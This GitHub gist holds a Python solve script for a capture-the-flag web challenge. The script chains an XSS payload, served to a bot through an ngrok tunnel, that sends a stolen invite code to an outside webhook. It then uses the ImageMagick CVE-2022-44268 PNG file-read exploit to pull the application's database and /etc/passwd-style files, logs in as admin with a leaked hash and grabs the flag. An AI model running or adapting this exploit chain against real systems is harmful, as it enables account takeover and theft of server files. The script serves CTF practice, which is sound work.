Created
August 5, 2025 11:40
-
-
Save lawbyte/7c6a5f96bb3ba960433f824142011512 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pyngrok import ngrok | |
| from flask import Flask, request | |
| from urllib.parse import urljoin | |
| from PIL import Image, PngImagePlugin | |
| from bs4 import BeautifulSoup | |
| import threading | |
| import requests | |
| import urllib3 | |
| import io | |
| import time | |
| import base64 | |
| urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | |
| sess = requests.Session() | |
| headers = { | |
| 'Content-Type': 'application/json', | |
| } | |
| sess.headers.update(headers) | |
| proxies = { | |
| 'http': 'http://127.0.0.1:8080', | |
| 'https': 'http://127.0.0.1:8080', | |
| } | |
| sess.proxies = proxies | |
| sess.verify = False | |
| # url = "https://localhost:1337/" | |
| url = "https://54.254.152.24:1337/" | |
| port = 5000 | |
| public_url = ngrok.connect(port).public_url.replace("https://", "") | |
| app = Flask(__name__) | |
| username = "test" | |
| password = "a" | |
| invite_code = None | |
| @app.route("/stage1", methods=["POST", "GET"]) | |
| def stage1(): | |
| html = """ | |
| <script> | |
| (async () => { | |
| response = await fetch(`https://localhost:1337/api/add-invite-code`, { | |
| method: "POST", | |
| credentials: 'include', | |
| mode: "no-cors", | |
| headers: { | |
| "Content-Type": "application/json" | |
| }, | |
| body: JSON.stringify({ | |
| username: "USERNAME" | |
| }) | |
| }); | |
| response = await fetch(`https://localhost:1337/api/invite-code/USERNAME`, { | |
| method: "GET", | |
| credentials: 'include' | |
| }); | |
| response = await response.json(); | |
| await fetch(`WEBHOOK_URL`, { | |
| method: "POST", | |
| headers: { | |
| "Content-Type": "application/json" | |
| }, | |
| body: JSON.stringify(response) | |
| }); | |
| })(); | |
| </script> | |
| """.replace("WEBHOOK_URL", f"https://{public_url}/leak").replace("USERNAME", username) | |
| return html, 200 | |
| @app.route("/leak", methods=["POST", "GET"]) | |
| def getleak(): | |
| global invite_code | |
| # leak = request.data | |
| leak = request.get_json() | |
| invite_code = leak['invite_code']['code'] | |
| print(f"{invite_code = }") | |
| return "oke", 20 | |
| def exploitMagick(read_file_path): # cve 2022 44268 | |
| dummy_img = Image.new('RGB', (1, 1), color='white') | |
| info = PngImagePlugin.PngInfo() | |
| info.add_text("profile", read_file_path) | |
| img_buffer = io.BytesIO() | |
| dummy_img.save(img_buffer, "PNG", pnginfo=info) | |
| img_buffer.seek(0) | |
| return img_buffer.getvalue() | |
| def register(username, password, invite_code): | |
| json_data = { | |
| 'username': username, | |
| 'email': '[email protected]', | |
| 'password': password, | |
| 'invite_code': invite_code, | |
| } | |
| response = sess.post(urljoin(url, '/api/register'), headers=headers, json=json_data, verify=False) | |
| def login(username, password): | |
| json_data = { | |
| 'username': username, | |
| 'password': password, | |
| } | |
| response = sess.post(urljoin(url, '/api/login'), headers=headers, json=json_data, verify=False) | |
| def upload(dummy_png): | |
| payload = base64.b64encode(dummy_png).decode('utf-8') | |
| json_data = { | |
| 'image': payload, | |
| } | |
| response = sess.post(urljoin(url, '/api/upload'), headers=headers, json=json_data, verify=False) | |
| def hex_to_bytes(hex_str): | |
| if len(hex_str) % 2: | |
| hex_str = '0' + hex_str | |
| return bytes.fromhex(hex_str) | |
| def extract_image(): | |
| response = sess.get(urljoin(url, '/home')) | |
| soup = BeautifulSoup(response.text, 'html.parser') | |
| image_url = soup.find_all('img')[-1]['src'] | |
| print(f"{image_url = }") | |
| response = sess.get(urljoin(url, image_url)) | |
| with open("a.png", "wb") as f: | |
| f.write(response.content) | |
| image = Image.open(io.BytesIO(response.content)) | |
| info = image.info | |
| result = "" | |
| for k, v in info.items(): | |
| if 'Raw profile type' in k: | |
| try: | |
| exfil = v.strip().split('\n') | |
| for hexVal in exfil[1:]: | |
| result += hexVal.strip() | |
| result = hex_to_bytes(result) | |
| except BaseException as e: | |
| print("err", e) | |
| pass | |
| return result | |
| server_thread = threading.Thread(target=lambda: app.run(host='0.0.0.0', port=port, debug=False)) | |
| server_thread.daemon = True | |
| server_thread.start() | |
| json_data = { | |
| 'url': f'https://localhost:1337@{public_url}/stage1', | |
| } | |
| response = sess.post(urljoin(url, '/api/report'), headers=headers, json=json_data, verify=False) | |
| while not invite_code: | |
| time.sleep(1) | |
| register(username, password, invite_code) | |
| login(username, password) | |
| # dummy_png = exploitMagick("/etc/passwd") | |
| dummy_png = exploitMagick("/app/instance/database.db") | |
| upload(dummy_png) | |
| result = extract_image() | |
| for i in result.split(): | |
| if b"[email protected]" in i: | |
| print(i) | |
| leak_admin_passwd = "dc900fdb915ee0d31d8daec80ff5a98968e5c690582d214db24462ac871d4c6d" | |
| login("admin", leak_admin_passwd) | |
| resp = sess.get(urljoin(url, '/flag')) | |
| import re | |
| flag_match = re.search(r'ITSEC\{.*?\}', resp.text) | |
| if flag_match: | |
| print(flag_match.group(0)) # ITSEC{ch41n1n9_th3_vuln_t0g3th3rr} | |
| else: | |
| print("Flag not found in response") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment